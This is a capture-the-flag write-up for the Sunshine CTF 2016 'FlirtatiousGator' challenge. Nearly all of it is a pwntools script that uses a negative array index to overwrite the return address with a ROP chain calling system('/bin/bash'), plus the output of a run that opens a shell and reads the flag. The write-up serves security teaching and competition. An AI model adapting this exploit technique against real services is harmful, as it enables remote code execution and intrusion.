300 - FlirtatiousGator

From JaxHax
Jump to: navigation, search

Challenge

FlirtatiousGator

300

Judges: kablaa

jump on that gator. below file running at

nc 4.31.182.242 9003

flag is in "/home/arr/flag"

Binary Download: Arr.tar.gz


Solution Script

###############################################
#
# Script: pwn-flirtatiousgator.py
#
# Author: Travis Phillips
#
# Date: 03/12/2016
#
# Purpose: To pwn the flirtatiousgator 300 challenge in b-sides
#          Orlando's Sunshine CTF 2016.
#
###############################################
from pwn import *
from binascii import hexlify
 
HOST = "4.31.182.242"
PORT = 9003
 
#context.log_level = "debug"
 
#######################################
# Generic function to handle the index
# value transaction of the program.
#######################################
def sendValues(conn, idx, val):
	conn.recvuntil("enter index\n")
	conn.sendline(str(idx))
	conn.recvuntil("enter value\n")
	conn.sendline(str(val))
 
 
#######################################
# Connect to server.
#######################################
conn = remote(HOST, PORT)
 
#######################################
# It ask for a name, give it something.
#######################################
conn.recvuntil('you?')
conn.sendline("batman")
 
#######################################
# Now the Fun Starts! Using negative
# ints we can underflow the index to 
# point to the end of our stack frame.
# This is relative, so ASLR doesn't matter
# and by using a ROP chain, DEP doesn't
# either!
#######################################
log.info("Rop: Overwriting return Address with scanf@plt")
sendValues(conn, -2147483635, 134513760)
 
log.info("Rop: pop2ret")
sendValues(conn, -2147483634, 134514618)
 
log.info("Rop: '%9s' string pointer")
sendValues(conn, -2147483633, 134514735)
 
log.info("Rop: Pointer to bss writable")
sendValues(conn, -2147483632, 134519724)
 
log.info("Rop: System@plt")
sendValues(conn, -2147483631, 134513712)
 
log.info("Rop: popret")
sendValues(conn, -2147483630, 134513625)
 
log.info("Rop: Pointer to bss writable")
sendValues(conn, -2147483629, 134519724)
 
log.info("Rop: exit(0)")
sendValues(conn, -2147483628, 134514219)
 
#######################################
# You get 10 writes, I only needed 8
# to get a shell. Burn the remaining 2.
#######################################
log.info("burning remaining: 1")
sendValues(conn, 1, 1)
 
log.info("burning remaining: 2")
sendValues(conn, 1, 1)
 
#######################################
# Get the array back from the program
#######################################
conn.recvuntil("0 1 0 0 0 0 0 0 0 0 ")
 
#######################################
# Now the program should be in the 
# scanf("%9s") function of our ROP. send
# it a /bin/bash string to pass to system()
#######################################
conn.sendline("/bin/bash")
 
#######################################
# Give control to the user...
#######################################
log.info("If all went well, you oughta have a shell.")
conn.interactive()
conn.close()


Script in Action

$ python pwn-flirtatiousgator.py 
[+] Opening connection to 4.31.182.242 on port 9003: Done
[*] Rop: Overwriting return Address with scanf@plt
[*] Rop: pop2ret
[*] Rop: '%9s' string pointer
[*] Rop: Pointer to bss writable
[*] Rop: System@plt
[*] Rop: popret
[*] Rop: Pointer to bss writable
[*] Rop: exit(0)
[*] burning remaining: 1
[*] burning remaining: 2
[*] If all went well, you oughta have a shell.
[*] Switching to interactive mode
$ pwd
/
$ cd home
$ ls
arr
$ cd arr
$ ls
arr
flag
$ cat flag
sun{I_feel_only_scales_and_shame}
$ exit
[*] Got EOF while reading in interactive
$ exit
$ exit
[*] Closed connection to 4.31.182.242 port 9003
[*] Got EOF while sending in interactive